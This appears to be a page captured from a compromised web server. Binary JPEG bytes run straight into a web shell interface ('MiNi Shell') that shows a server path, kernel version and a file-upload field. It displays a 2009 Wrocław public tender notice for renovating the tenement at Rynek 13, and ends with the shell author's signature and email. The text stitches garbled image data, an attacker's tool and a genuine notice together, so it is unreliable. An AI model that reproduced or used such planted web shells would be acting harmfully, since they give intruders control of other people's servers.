JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090227/44466-N-2009.html

<p class="kh_header"><b>Wrocław: Zaprojektowanie, uzyskanie pozwolenia na budowę oraz wykonanie przebudowy i remontu kamienicy przy ul. Rynek 13 we Wrocławiu</b><br>
<b>Numer ogłoszenia: 44466 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wrocław Urząd Miejski Wrocławia , pl. Nowy Targ 1/8, 50-141 Wrocław, woj. dolnośląskie, tel. 071 7779230, 7779231, faks 071 7779229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wroclaw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie, uzyskanie pozwolenia na budowę oraz wykonanie przebudowy i remontu kamienicy przy ul. Rynek 13 we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie na podstawie Projektu koncepcyjnego:
-projektu budowlanego i wykonawczego z branżami na przebudowę i remont kamienicy przy ul. Rynek 13 we Wrocławiu (z wyłączeniem elewacji, dachu i piwnicy),
-uzyskania pozwolenia na budowę oraz pozwolenia konserwatorskiego wraz z uzyskaniem odstępstw od wymaganych Prawem Budowlanym warunków technicznych,
-wykonanie przebudowy i remontu kamienicy przy ul. Rynek 13 we Wrocławiu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 71.22.10.00-3, 45.31.10.00-0, 45.33.10.00-6, 45.33.11.00-7, 45.42.11.30-4, 45.42.11.46-9, 45.43.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest do wniesienia wadium w wysokości 11.340,00 PLN  (słownie: jedenaście tysięcy trzysta czterdzieści  zł 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.spełniają warunki określone w przepisie art. 22 ust. 1 ustawy Pzp;
2. wykonali w okresie ostatnich pięciu  lat z należytą starannością, a jeżeli okres działalności jest  krótszy - w tym okresie, co najmniej dwie roboty budowlane w zakresie przebudowy lub remontów obiektów zabytkowych odpowiadające swoim rodzajem przedmiotowi zamówienia na kwotę o wartości nie mniejszej niż 2.000.000,- złotych brutto każda  w zakresie których w szczególności wykonywane były następujące prace:
- okablowanie strukturalne na min. 50 punktów ZPK;
3. Posiadają doświadczenie w pracach projektowych tj. wykonali co najmniej w okresie ostatnich pięciu lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie), dwa projekty w zakresie przebudowy lub remontów obiektów zabytkowych odpowiadające swoim rodzajem przedmiotowi zamówienia na kwotę o wartości nie mniejszej niż 100.000,- złotych brutto każdy oraz załączą dokumenty potwierdzające,  że wskazane projekty zostały wykonane z należytą starannością;
4. dysponują lub będą dysponować:
1) kierownikiem budowy, który posiada uprawnienia budowlane w specjalności konstrukcyjno - budowlanej, oraz odbył co najmniej 2 letnią praktykę zawodową na budowie przy zabytkach nieruchomych, a także pełnił funkcję kierownika budowy na co najmniej jednym zadaniu tożsamym z zakresem zamówienia oraz przynależy do właściwej Izby Samorządu Zawodowego.
2)  kierownikami robót branżowych posiadającymi uprawnienia budowlane do kierowania robotami branżowymi we właściwych specjalnościach tj.: 
a ) instalacyjnej do kierowania robotami w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
b ) instalacyjnej do kierowania robotami w zakresie sieci, instalacji i urządzeń elektrycznych, oraz przynależą do włąściwej Izby Samorządu Zawodowego
3) projektantem, który posiada uprawnienia budowlane w specjalności konstrukcyjno - budowlanej  w zakresie sporządzania projektu architektoniczno-budowlanego  a także przynależy  do właściwej Izby Samorządu Zawodowego,
4) projektantami branżowymi posiadającymi uprawnienia   projektowe we właściwych specjalnościach:
-	instalacyjnej do projektowania w zakresie instalacji i urządzeń cieplnych, wentylacyjnych ograniczeń, wodociągowych i kanalizacyjnych,  
-	instalacyjnej do projektowania w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 
oraz przynależą do właściwej Izby Samorządu Zawodowego.
5) projektantami sprawdzającymi projekt, którzy posiadają uprawnienia budowlane w specjalności:
-  konstrukcyjno - budowlanej  w zakresie sporządzania projektu architektoniczno-budowlanego,
-   instalacyjnej do projektowania  w zakresie instalacji  i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, 
- instalacyjnej do projektowania w zakresie sieci, instalacji  i urządzeń elektrycznych i elektroenergetycznych, 
oraz przynależą do właściwej Izby Samorządu Zawodowego,
6) minimum 1 osobą wyznaczoną do realizacji zamówienia, posiadającą certyfikat producenta systemu okablowania strukturalnego do wykonania okablowania strukturalnego, dotyczący posiadania kwalifikacji w zakresie: projektowania, nadzoru instalacji oraz kwalifikowania okablowania strukturalnego do 20 letniej gwarancji niezawodności.
5. posiadają aktualną polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności,  na kwotę nie mniejszą niż   2.000 000 zł. 

Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu:
Na potwierdzenie spełnienia wyżej wymienionych warunków Wykonawca dołączy do oferty oświadczenia i dokumenty wymienione poniżej. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana według formuły: spełnia - nie spełnia  w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> w formie oryginału:
1)Oświadczenie z art. 22 ust.1 ustawy Pzp .
w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę  § 4.1. Rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane:
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
Odpis zaświadczenie musi zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy. Wykonawcy, którzy dokonali zmian w zakresie organów, które nie są uwidocznione w dokumencie rejestrowym winni złożyć dokumenty potwierdzające powołanie nowych osób w skład organu zarządzającego (np. uchwała w sprawie powołania określonej osoby).
3)  aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 4-8 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 9 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w odniesieniu do podmiotów zbiorowych,
5) aktualne na dzień składania oferty zaświadczenie właściwego naczelnika urzędu skarbowego i oddziału ZUS lub KRUS potwierdzające odpowiednio że Wykonawca nie zalega z opłacaniem podatków i opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie  lub rozłożenie  na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6) wykaz zrealizowanych z należytą starannością w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
-   co najmniej dwie roboty budowlane w zakresie przebudowy lub remontów obiektów zabytkowych odpowiadające swoim rodzajem przedmiotowi zamówienia na kwotę o wartości nie mniejszej niż 2.000.000,- złotych brutto każda  w zakresie których w szczególności wykonywane było  okablowanie strukturalne na min. 50 punktów ZPK.  
-	co najmniej dwa projekty w zakresie przebudowy lub remontów obiektów zabytkowych odpowiadające swoim rodzajem przedmiotowi zamówienia na kwotę o wartości nie mniejszej niż 100.000,- złotych brutto każdy. 
    Fakt należytego wykonania robót i projektów przed dniem wszczęcia postępowania musi być potwierdzony odpowiednimi dokumentami dołączonymi do wykazu. Wykaz ma potwierdzać  spełnienie warunków z pkt III.2.2 i 3 ogłoszenia.
7) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresy wykonywanych przez nie czynności. Wykaz ma potwierdzać spełnianie warunków, o których mowa w pkt III.2.4 ogłoszenia. W przypadku osoby wyznaczonej do realizacji zamówienia, posiadającej certyfikat producenta systemu okablowania strukturalnego do wykonania okablowania strukturalnego, dotyczący posiadania kwalifikacji w zakresie: projektowania, nadzoru instalacji oraz kwalifikowania okablowania strukturalnego do 20 letniej gwarancji niezawodności należy załączyć do oferty oświadczenie o jego posiadaniu przez daną osobę.
Do wykazu należy dołączyć dokumenty potwierdzające posiadanie stosownych uprawnień przez kierownika budowy, kierowników robót branżowych oraz projektantów oraz dokumenty potwierdzające przynależność wymienionych osób do właściwej Izby Samorząd Zawodowego. W przypadku gdy Wykonawca będzie dysponował ww. personelem należy załączyć dodatkowo pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
8)  Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,  na kwotę nie mniejszą niż 2.000.000 zł..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wroclaw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wrocław al. Kromera 44 pok. 25.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 09:00, miejsce: Wrocław al. Kromera 44 pok. 25.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com